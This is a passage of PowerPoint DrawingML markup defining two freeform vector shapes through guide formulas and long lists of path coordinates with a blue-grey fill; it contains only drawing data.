                  <a:gd name="T14" fmla="*/ 102 w 267"/>
                  <a:gd name="T15" fmla="*/ 289 h 300"/>
                  <a:gd name="T16" fmla="*/ 93 w 267"/>
                  <a:gd name="T17" fmla="*/ 281 h 300"/>
                  <a:gd name="T18" fmla="*/ 86 w 267"/>
                  <a:gd name="T19" fmla="*/ 273 h 300"/>
                  <a:gd name="T20" fmla="*/ 82 w 267"/>
                  <a:gd name="T21" fmla="*/ 262 h 300"/>
                  <a:gd name="T22" fmla="*/ 71 w 267"/>
                  <a:gd name="T23" fmla="*/ 257 h 300"/>
                  <a:gd name="T24" fmla="*/ 68 w 267"/>
                  <a:gd name="T25" fmla="*/ 248 h 300"/>
                  <a:gd name="T26" fmla="*/ 56 w 267"/>
                  <a:gd name="T27" fmla="*/ 239 h 300"/>
                  <a:gd name="T28" fmla="*/ 54 w 267"/>
                  <a:gd name="T29" fmla="*/ 231 h 300"/>
                  <a:gd name="T30" fmla="*/ 40 w 267"/>
                  <a:gd name="T31" fmla="*/ 225 h 300"/>
                  <a:gd name="T32" fmla="*/ 35 w 267"/>
                  <a:gd name="T33" fmla="*/ 219 h 300"/>
                  <a:gd name="T34" fmla="*/ 26 w 267"/>
                  <a:gd name="T35" fmla="*/ 217 h 300"/>
                  <a:gd name="T36" fmla="*/ 28 w 267"/>
                  <a:gd name="T37" fmla="*/ 198 h 300"/>
                  <a:gd name="T38" fmla="*/ 17 w 267"/>
                  <a:gd name="T39" fmla="*/ 179 h 300"/>
                  <a:gd name="T40" fmla="*/ 12 w 267"/>
                  <a:gd name="T41" fmla="*/ 170 h 300"/>
                  <a:gd name="T42" fmla="*/ 8 w 267"/>
                  <a:gd name="T43" fmla="*/ 155 h 300"/>
                  <a:gd name="T44" fmla="*/ 1 w 267"/>
                  <a:gd name="T45" fmla="*/ 154 h 300"/>
                  <a:gd name="T46" fmla="*/ 6 w 267"/>
                  <a:gd name="T47" fmla="*/ 142 h 300"/>
                  <a:gd name="T48" fmla="*/ 4 w 267"/>
                  <a:gd name="T49" fmla="*/ 133 h 300"/>
                  <a:gd name="T50" fmla="*/ 10 w 267"/>
                  <a:gd name="T51" fmla="*/ 124 h 300"/>
                  <a:gd name="T52" fmla="*/ 18 w 267"/>
                  <a:gd name="T53" fmla="*/ 105 h 300"/>
                  <a:gd name="T54" fmla="*/ 34 w 267"/>
                  <a:gd name="T55" fmla="*/ 104 h 300"/>
                  <a:gd name="T56" fmla="*/ 34 w 267"/>
                  <a:gd name="T57" fmla="*/ 85 h 300"/>
                  <a:gd name="T58" fmla="*/ 34 w 267"/>
                  <a:gd name="T59" fmla="*/ 56 h 300"/>
                  <a:gd name="T60" fmla="*/ 35 w 267"/>
                  <a:gd name="T61" fmla="*/ 33 h 300"/>
                  <a:gd name="T62" fmla="*/ 50 w 267"/>
                  <a:gd name="T63" fmla="*/ 31 h 300"/>
                  <a:gd name="T64" fmla="*/ 56 w 267"/>
                  <a:gd name="T65" fmla="*/ 0 h 300"/>
                  <a:gd name="T66" fmla="*/ 83 w 267"/>
                  <a:gd name="T67" fmla="*/ 0 h 300"/>
                  <a:gd name="T68" fmla="*/ 129 w 267"/>
                  <a:gd name="T69" fmla="*/ 0 h 300"/>
                  <a:gd name="T70" fmla="*/ 238 w 267"/>
                  <a:gd name="T71" fmla="*/ 0 h 300"/>
                  <a:gd name="T72" fmla="*/ 245 w 267"/>
                  <a:gd name="T73" fmla="*/ 38 h 300"/>
                  <a:gd name="T74" fmla="*/ 253 w 267"/>
                  <a:gd name="T75" fmla="*/ 55 h 300"/>
                  <a:gd name="T76" fmla="*/ 265 w 267"/>
                  <a:gd name="T77" fmla="*/ 63 h 300"/>
                  <a:gd name="T78" fmla="*/ 263 w 267"/>
                  <a:gd name="T79" fmla="*/ 69 h 300"/>
                  <a:gd name="T80" fmla="*/ 255 w 267"/>
                  <a:gd name="T81" fmla="*/ 76 h 300"/>
                  <a:gd name="T82" fmla="*/ 249 w 267"/>
                  <a:gd name="T83" fmla="*/ 82 h 300"/>
                  <a:gd name="T84" fmla="*/ 240 w 267"/>
                  <a:gd name="T85" fmla="*/ 87 h 300"/>
                  <a:gd name="T86" fmla="*/ 237 w 267"/>
                  <a:gd name="T87" fmla="*/ 102 h 300"/>
                  <a:gd name="T88" fmla="*/ 233 w 267"/>
                  <a:gd name="T89" fmla="*/ 122 h 300"/>
                  <a:gd name="T90" fmla="*/ 232 w 267"/>
                  <a:gd name="T91" fmla="*/ 135 h 300"/>
                  <a:gd name="T92" fmla="*/ 220 w 267"/>
                  <a:gd name="T93" fmla="*/ 154 h 300"/>
                  <a:gd name="T94" fmla="*/ 211 w 267"/>
                  <a:gd name="T95" fmla="*/ 167 h 300"/>
                  <a:gd name="T96" fmla="*/ 207 w 267"/>
                  <a:gd name="T97" fmla="*/ 185 h 300"/>
                  <a:gd name="T98" fmla="*/ 200 w 267"/>
                  <a:gd name="T99" fmla="*/ 185 h 300"/>
                  <a:gd name="T100" fmla="*/ 197 w 267"/>
                  <a:gd name="T101" fmla="*/ 200 h 300"/>
                  <a:gd name="T102" fmla="*/ 194 w 267"/>
                  <a:gd name="T103" fmla="*/ 222 h 300"/>
                  <a:gd name="T104" fmla="*/ 182 w 267"/>
                  <a:gd name="T105" fmla="*/ 223 h 300"/>
                  <a:gd name="T106" fmla="*/ 178 w 267"/>
                  <a:gd name="T107" fmla="*/ 232 h 300"/>
                  <a:gd name="T108" fmla="*/ 188 w 267"/>
                  <a:gd name="T109" fmla="*/ 235 h 300"/>
                  <a:gd name="T110" fmla="*/ 203 w 267"/>
                  <a:gd name="T111" fmla="*/ 250 h 300"/>
                  <a:gd name="T112" fmla="*/ 214 w 267"/>
                  <a:gd name="T113" fmla="*/ 269 h 300"/>
                  <a:gd name="T114" fmla="*/ 222 w 267"/>
                  <a:gd name="T115" fmla="*/ 274 h 300"/>
                  <a:gd name="T116" fmla="*/ 222 w 267"/>
                  <a:gd name="T117" fmla="*/ 283 h 300"/>
                  <a:gd name="T118" fmla="*/ 211 w 267"/>
                  <a:gd name="T119" fmla="*/ 284 h 300"/>
                  <a:gd name="T120" fmla="*/ 198 w 267"/>
                  <a:gd name="T121" fmla="*/ 286 h 300"/>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67"/>
                  <a:gd name="T184" fmla="*/ 0 h 300"/>
                  <a:gd name="T185" fmla="*/ 267 w 267"/>
                  <a:gd name="T186" fmla="*/ 300 h 300"/>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67" h="300">
                    <a:moveTo>
                      <a:pt x="193" y="292"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="292"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36404" name="Freeform 136"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3085" y="2588"/>
                <a:ext cx="267" cy="300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 185 w 267"/>
                  <a:gd name="T1" fmla="*/ 298 h 300"/>
                  <a:gd name="T2" fmla="*/ 178 w 267"/>
                  <a:gd name="T3" fmla="*/ 296 h 300"/>
                  <a:gd name="T4" fmla="*/ 159 w 267"/>
                  <a:gd name="T5" fmla="*/ 300 h 300"/>
                  <a:gd name="T6" fmla="*/ 145 w 267"/>
                  <a:gd name="T7" fmla="*/ 298 h 300"/>
                  <a:gd name="T8" fmla="*/ 125 w 267"/>
                  <a:gd name="T9" fmla="*/ 284 h 300"/>
                  <a:gd name="T10" fmla="*/ 119 w 267"/>
                  <a:gd name="T11" fmla="*/ 289 h 300"/>
                  <a:gd name="T12" fmla="*/ 110 w 267"/>
                  <a:gd name="T13" fmla="*/ 285 h 300"/>
                  <a:gd name="T14" fmla="*/ 102 w 267"/>
                  <a:gd name="T15" fmla="*/ 289 h 300"/>
                  <a:gd name="T16" fmla="*/ 93 w 267"/>
                  <a:gd name="T17" fmla="*/ 281 h 300"/>
                  <a:gd name="T18" fmla="*/ 86 w 267"/>
                  <a:gd name="T19" fmla="*/ 273 h 300"/>
                  <a:gd name="T20" fmla="*/ 82 w 267"/>
                  <a:gd name="T21" fmla="*/ 262 h 300"/>
                  <a:gd name="T22" fmla="*/ 71 w 267"/>
                  <a:gd name="T23" fmla="*/ 257 h 300"/>
                  <a:gd name="T24" fmla="*/ 68 w 267"/>
                  <a:gd name="T25" fmla="*/ 248 h 300"/>
                  <a:gd name="T26" fmla="*/ 56 w 267"/>
                  <a:gd name="T27" fmla="*/ 239 h 300"/>
                  <a:gd name="T28" fmla="*/ 54 w 267"/>
                  <a:gd name="T29" fmla="*/ 231 h 300"/>
                  <a:gd name="T30" fmla="*/ 40 w 267"/>
                  <a:gd name="T31" fmla="*/ 225 h 300"/>
                  <a:gd name="T32" fmla="*/ 35 w 267"/>
                  <a:gd name="T33" fmla="*/ 219 h 300"/>
                  <a:gd name="T34" fmla="*/ 26 w 267"/>
                  <a:gd name="T35" fmla="*/ 217 h 300"/>
                  <a:gd name="T36" fmla="*/ 28 w 267"/>
                  <a:gd name="T37" fmla="*/ 198 h 300"/>
                  <a:gd name="T38" fmla="*/ 17 w 267"/>
                  <a:gd name="T39" fmla="*/ 179 h 300"/>
                  <a:gd name="T40" fmla="*/ 12 w 267"/>
                  <a:gd name="T41" fmla="*/ 170 h 300"/>
                  <a:gd name="T42" fmla="*/ 8 w 267"/>
                  <a:gd name="T43" fmla="*/ 155 h 300"/>
                  <a:gd name="T44" fmla="*/ 1 w 267"/>
                  <a:gd name="T45" fmla="*/ 154 h 300"/>
                  <a:gd name="T46" fmla="*/ 6 w 267"/>
                  <a:gd name="T47" fmla="*/ 142 h 300"/>
                  <a:gd name="T48" fmla="*/ 4 w 267"/>
                  <a:gd name="T49" fmla="*/ 133 h 300"/>
                  <a:gd name="T50" fmla="*/ 10 w 267"/>
                  <a:gd name="T51" fmla="*/ 124 h 300"/>
                  <a:gd name="T52" fmla="*/ 18 w 267"/>
                  <a:gd name="T53" fmla="*/ 105 h 300"/>
                  <a:gd name="T54" fmla="*/ 34 w 267"/>
                  <a:gd name="T55" fmla="*/ 104 h 300"/>
                  <a:gd name="T56" fmla="*/ 34 w 267"/>
                  <a:gd name="T57" fmla="*/ 85 h 300"/>
                  <a:gd name="T58" fmla="*/ 34 w 267"/>
                  <a:gd name="T59" fmla="*/ 56 h 300"/>
                  <a:gd name="T60" fmla="*/ 35 w 267"/>
                  <a:gd name="T61" fmla="*/ 33 h 300"/>
                  <a:gd name="T62" fmla="*/ 50 w 267"/>
                  <a:gd name="T63" fmla="*/ 31 h 300"/>
                  <a:gd name="T64" fmla="*/ 56 w 267"/>
                  <a:gd name="T65" fmla="*/ 0 h 300"/>
                  <a:gd name="T66" fmla="*/ 83 w 267"/>
                  <a:gd name="T67" fmla="*/ 0 h 300"/>
                  <a:gd name="T68" fmla="*/ 129 w 267"/>
                  <a:gd name="T69" fmla="*/ 0 h 300"/>
                  <a:gd name="T70" fmla="*/ 238 w 267"/>
                  <a:gd name="T71" fmla="*/ 0 h 300"/>
                  <a:gd name="T72" fmla="*/ 245 w 267"/>
                  <a:gd name="T73" fmla="*/ 38 h 300"/>
                  <a:gd name="T74" fmla="*/ 253 w 267"/>
                  <a:gd name="T75" fmla="*/ 55 h 300"/>
                  <a:gd name="T76" fmla="*/ 265 w 267"/>
                  <a:gd name="T77" fmla="*/ 63 h 300"/>
                  <a:gd name="T78" fmla="*/ 263 w 267"/>
                  <a:gd name="T79" fmla="*/ 69 h 300"/>
                  <a:gd name="T80" fmla="*/ 255 w 267"/>
                  <a:gd name="T81" fmla="*/ 76 h 300"/>
                  <a:gd name="T82" fmla="*/ 249 w 267"/>
                  <a:gd name="T83" fmla="*/ 82 h 300"/>
                  <a:gd name="T84" fmla="*/ 240 w 267"/>
                  <a:gd name="T85" fmla="*/ 87 h 300"/>
                  <a:gd name="T86" fmla="*/ 237 w 267"/>
                  <a:gd name="T87" fmla="*/ 102 h 300"/>
                  <a:gd name="T88" fmla="*/ 233 w 267"/>
                  <a:gd name="T89" fmla="*/ 122 h 300"/>
                  <a:gd name="T90" fmla="*/ 232 w 267"/>
                  <a:gd name="T91" fmla="*/ 135 h 300"/>
                  <a:gd name="T92" fmla="*/ 220 w 267"/>
                  <a:gd name="T93" fmla="*/ 154 h 300"/>
                  <a:gd name="T94" fmla="*/ 211 w 267"/>
                  <a:gd name="T95" fmla="*/ 167 h 300"/>
                  <a:gd name="T96" fmla="*/ 207 w 267"/>
                  <a:gd name="T97" fmla="*/ 185 h 300"/>
                  <a:gd name="T98" fmla="*/ 200 w 267"/>
                  <a:gd name="T99" fmla="*/ 185 h 300"/>
                  <a:gd name="T100" fmla="*/ 197 w 267"/>
                  <a:gd name="T101" fmla="*/ 200 h 300"/>
                  <a:gd name="T102" fmla="*/ 194 w 267"/>
                  <a:gd name="T103" fmla="*/ 222 h 300"/>
                  <a:gd name="T104" fmla="*/ 182 w 267"/>
                  <a:gd name="T105" fmla="*/ 223 h 300"/>
                  <a:gd name="T106" fmla="*/ 178 w 267"/>
                  <a:gd name="T107" fmla="*/ 232 h 300"/>
                  <a:gd name="T108" fmla="*/ 188 w 267"/>
                  <a:gd name="T109" fmla="*/ 235 h 300"/>
                  <a:gd name="T110" fmla="*/ 203 w 267"/>
                  <a:gd name="T111" fmla="*/ 250 h 300"/>
                  <a:gd name="T112" fmla="*/ 214 w 267"/>
                  <a:gd name="T113" fmla="*/ 269 h 300"/>
                  <a:gd name="T114" fmla="*/ 222 w 267"/>
                  <a:gd name="T115" fmla="*/ 274 h 300"/>
                  <a:gd name="T116" fmla="*/ 222 w 267"/>
                  <a:gd name="T117" fmla="*/ 283 h 300"/>
                  <a:gd name="T118" fmla="*/ 211 w 267"/>
                  <a:gd name="T119" fmla="*/ 284 h 300"/>
                  <a:gd name="T120" fmla="*/ 198 w 267"/>
                  <a:gd name="T121" fmla="*/ 286 h 300"/>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67"/>
                  <a:gd name="T184" fmla="*/ 0 h 300"/>
                  <a:gd name="T185" fmla="*/ 267 w 267"/>
                  <a:gd name="T186" fmla="*/ 300 h 300"/>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67" h="300">
                    <a:moveTo>
                      <a:pt x="193" y="292"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
